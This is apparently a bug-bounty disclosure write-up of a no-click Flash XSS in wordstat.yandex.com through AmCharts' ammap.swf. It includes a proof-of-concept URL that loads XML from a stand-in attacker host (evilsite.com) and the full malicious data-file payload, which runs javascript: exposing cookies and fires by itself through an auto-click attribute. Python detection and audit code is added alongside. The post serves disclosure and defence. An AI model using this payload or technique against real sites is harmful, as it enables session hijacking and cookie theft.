XSS in Yandex - AmCharts component

Here I present a (reported) Flash-based XSS vulnerability I discovered in wordstat.yandex.com, which requires no user interaction.

I think it is particularly interesting for several reasons. It exploits the fact that the ammap.swf file, which is part of AmCharts, is vulnerable to external resource loading which allows for content spoofing and, ultimately, arbitrary JavaScript execution in the context of the hosting domain (in this case, wordstat.yandex.com).

By disassembling the SWF, we discover that the data_file and settings_file parameters are user controllable and can be supplied directly in the URL.

Disassembling the SWF (1)

The parameters are then retrieved and the XML is parsed:

Disassembling the SWF (2)

Quick link to a proof of concept:

http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml&settings_file=http://evilsite.com/ammap_settings.xml&.swf

We control the "map" by providing two XML files, hosted on an external server.
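The root cause is that ammap.swf fetches whatever data_file and settings_file point to, including URLs on other hosts. The following Python is an added example (not code from the post or from AmCharts) showing the check a server-side allowlist or a log-review script would apply: it flags any request to the SWF whose file parameters resolve to a host other than the one serving the SWF. The trusted host is taken from the post's PoC URL; the access-log lines are constructed and the log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Host the SWF is served from, taken from the post's PoC URL.
TRUSTED_HOST = "wordstat.yandex.com"

# ammap.swf parameters that name resources fetched at runtime (from the post).
FILE_PARAMS = ("data_file", "settings_file", "path")


def external_file_params(request_url, trusted_host=TRUSTED_HOST):
    """Return {param: value} for file parameters that point off the trusted host.

    A value is flagged when it is an absolute URL (has a scheme, or is
    protocol-relative "//host/...") whose host is not the trusted host, or
    has no host at all (e.g. a bare "javascript:" value). Relative paths are
    accepted, which is what a same-origin allowlist would enforce server-side.
    """
    parts = urlsplit(request_url)
    findings = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in FILE_PARAMS:
            continue
        for value in values:
            target = urlsplit(value.strip())
            if target.scheme or target.netloc:
                # .hostname is already lower-cased by urlsplit.
                if (target.hostname or "") != trusted_host:
                    findings[name] = value
    return findings


# Constructed sample access-log lines (not from the post), assumed format:
#   <vhost> "GET <path> HTTP/1.1"
SAMPLE_LOG = """\
wordstat.yandex.com "GET /flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml&settings_file=http://evilsite.com/ammap_settings.xml&.swf HTTP/1.1"
wordstat.yandex.com "GET /flash/ammap/ammap.swf?data_file=ammap_data.xml&settings_file=ammap_settings.xml HTTP/1.1"
wordstat.yandex.com "GET /flash/ammap/ammap.swf?data_file=//evilsite.com/d.xml HTTP/1.1"
"""

_LOG_RE = re.compile(r'^(\S+) "GET (\S+) ')


def scan_log(log_text, swf_path="/flash/ammap/ammap.swf"):
    """Return [(request_path, findings)] for SWF requests with off-host file params."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        vhost, path = m.group(1), m.group(2)
        if not path.startswith(swf_path):
            continue
        findings = external_file_params("http://" + vhost + path, vhost)
        if findings:
            hits.append((path, findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print("off-host resource load:", path, findings)
```

The same predicate, applied in the request handler that serves the SWF (or in the loader code itself, had it been patched), is the fix: reject or rewrite any data_file/settings_file value that is not a same-origin relative path.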

File ammap_settings.xml just sets a white background and disables controls such as zoom and arrows, the legend, the small map, etc.

File ammap_data.xml is the interesting one. Here is the malicious payload:

<?xml version="1.0" encoding="UTF-8"?>
<map map_file="http://appsec.ws/ExploitDB/Configs/amMap/people.swf" zoom="100%" url="#xss">
  <movies>
    <movie file="rectangle" oid="xss" x="0" y="0" width="100%" height="100%" color="#FFFFFF"
    alpha="0" url="javascript:alert('XSS by Miki (//miki.it)\ndocument.domain = ' +
    document.domain + '\ndocument.cookie = ' + document.cookie + '\nlocation.href = ' +
    location.href)">
    </movie>
  </movies>
</map>

As you can see, an external SWF is loaded as the map, and an area (called a movie) of rectangular shape (file="rectangle") is defined that covers the whole screen and is transparent (alpha="0").

The area, if clicked, triggers the execution of a simple JavaScript function, in this case an alert box that displays document.domain, document.cookie and location.href.

In order to make it work without user interaction, we have added an object id (oid) to the movie with the oid="xss" attribute, and simulated a click on the movie with the url="#xss" attribute of the <map> tag, as described in the AmCharts documentation:

Attribute   Type         Meaning
url         #object_id   Id of object which should be "clicked" when map initializes

This leads to arbitrary JS execution in the context of wordstat.yandex.com without any user interaction:
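For anyone reviewing ammap data files (or triaging a report like this one), the two properties that together remove the need for a click are a movie whose url carries a script scheme and a <map url="#oid"> that auto-clicks that same movie. The following Python is an added example, not code from the post or from AmCharts: it parses a data file with the structure described above and reports an off-host map_file, any movie with a script-scheme url, and the auto-click combination. The sample XML is a constructed copy of the post's structure with a placeholder host; the trusted host is taken from the post.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample mirroring the structure of the post's ammap_data.xml
# (placeholder host, harmless alert); not the author's file.
SAMPLE_DATA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<map map_file="http://example.invalid/people.swf" zoom="100%" url="#xss">
  <movies>
    <movie file="rectangle" oid="xss" x="0" y="0" width="100%" height="100%"
           color="#FFFFFF" alpha="0" url="javascript:alert(document.domain)">
    </movie>
    <movie file="rectangle" oid="ok" url="http://example.invalid/info.html">
    </movie>
  </movies>
</map>
"""

# URL schemes that the Flash player hands to the browser as script.
SCRIPT_SCHEMES = {"javascript", "vbscript"}


def url_scheme(value):
    """Scheme of an attribute value after dropping control characters and case."""
    cleaned = "".join(ch for ch in value if ch.isprintable()).strip().lower()
    return urlsplit(cleaned).scheme


def audit_ammap_data(xml_text, trusted_host):
    """Return a list of findings as tuples whose first element is the kind:
    ("external_map_file", url), ("script_url", oid, url),
    ("auto_click_script_url", oid)."""
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    root = ET.fromstring(xml_text)
    findings = []

    # 1. The map itself is loaded from another host (content spoofing vector).
    map_file = root.get("map_file", "")
    mf = urlsplit(map_file.strip())
    if (mf.scheme or mf.netloc) and (mf.hostname or "") != trusted_host:
        findings.append(("external_map_file", map_file))

    # 2. <map url="#oid"> clicks that movie on initialisation.
    auto_click = root.get("url", "").strip()
    auto_oid = auto_click[1:] if auto_click.startswith("#") else None

    # 3. Any movie whose url is a script scheme; worse if it is the auto-clicked one.
    for movie in root.iter("movie"):
        url = movie.get("url", "")
        oid = movie.get("oid")
        if url_scheme(url) in SCRIPT_SCHEMES:
            findings.append(("script_url", oid, url))
            if oid is not None and oid == auto_oid:
                findings.append(("auto_click_script_url", oid))
    return findings


if __name__ == "__main__":
    for finding in audit_ammap_data(SAMPLE_DATA_XML, "wordstat.yandex.com"):
        print(finding)
```

The scheme check runs on the value after stripping control characters and lower-casing, because the player's URL handling is more forgiving than a naive `startswith("javascript:")` comparison. A zero-interaction finding is only the combination of the second and third checks; a script url on a movie that is not auto-clicked still needs the user to click the transparent area.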

Javascript executed by just opening a URL.